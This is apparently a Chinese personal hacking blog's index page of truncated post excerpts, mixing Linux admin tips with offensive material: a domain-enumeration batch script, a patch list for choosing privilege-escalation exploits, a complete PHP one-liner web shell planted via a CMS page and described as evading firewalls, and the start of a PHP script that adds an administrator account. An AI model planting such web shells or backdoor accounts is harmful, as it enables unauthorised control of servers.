小马博客

一个无聊的人,一个无聊的博客

[task] @echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ^|find "--"...

发布 0 条评论

一些本地提权漏洞,对应的补丁序列号,提权的时候会用到,先看看打没打补丁,再决定用哪个。这样不用做无用功。 KB2360937 →MS10-084 KB2478960 →MS11-014 KB2507938→ MS11-056 KB2566454→ MS11-062 KB2646524 →MS12-003 KB26456...

发布 0 条评论

一、rpm包安装方式步骤: 1、找到相应的软件包,比如soft.version.rpm,下载到本机某个目录; 2、打开一个终端,su -成root用户; 3、cd soft.version.rpm所在的目录; 4、输入rpm -ivh soft.version.rpm 二、deb包安装方式步骤: 1...

发布 0 条评论

百度搜索了下,还没大牛发出来过。 进入后台后:到快捷菜单----独立页面管理---增加页面---插入特俗一句话(<?php $_GET['ts7']($_POST['cmd']);?> 这个一句话一般防火墙是不会杀的。 然后菜刀连接如:  www.i0day.com/test.php?ts7...

发布 0 条评论

首先,这脚本写的粗糙。大牛别笑话小菜了。 Ps:这脚本只能运行在Linux下,Unix下是不行的。(就算你手动UNIX下也是很难装成功的) 搭建成功以后,账户是vpn 密码是vpn365 代码如下: [task] #!/bin/sh echo -e "\033[1;035m \n" e...

发布 0 条评论

此账号仅能在SAE平台上使用,不能从外部连接 我们建议开发者使用SaeMysql操作数据库 如果您想自己实现数据库相关操作,可以使用以下常量: 用户名  : SAE_MYSQL_USER 密  码 : SAE_MYSQL_PASS 主库域名 : SAE_MYSQL_HOST_M 从...

发布 0 条评论

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen 以及wscript.shell 组建被禁用的情况下,这也许是一个机会。 代码如下: <?php echo "<div align=center><b>PHP 版Shell.Users加管理员帐号&l...

发布 0 条评论

中间人攻击虽然古老,但仍处于受到黑客攻击的危险中,可能会严重导致危害服务器和用户。仍然有很多变种的中间人攻击是有效的,它们能够很容易的欺骗外行并且入侵他们。正如字面意思一样,中间人攻击就是攻击者扮演中间人并且实施攻击...

发布 0 条评论

lanmp一键安装包是wdlinux官网2010年开始推出的lamp,lnmp,lnamp(apache,nginx,php,mysql,zend,eAccelerator,pureftpd)应用环境的快速简易安装包,执行一个脚本,整个环境就安装完成就可使用,快速,方便易用,安全稳定. 但由于源码编译...

发布 0 条评论

开始之前,我们先来看一下 find 命令的基本结构: find start_directory test options criteria_to_match action_to_perform_on_results 在以下命令中,find将开始在当前目录(用“.”表示)中查找任何扩展名为“java”的文件: find . ...

发布 0 条评论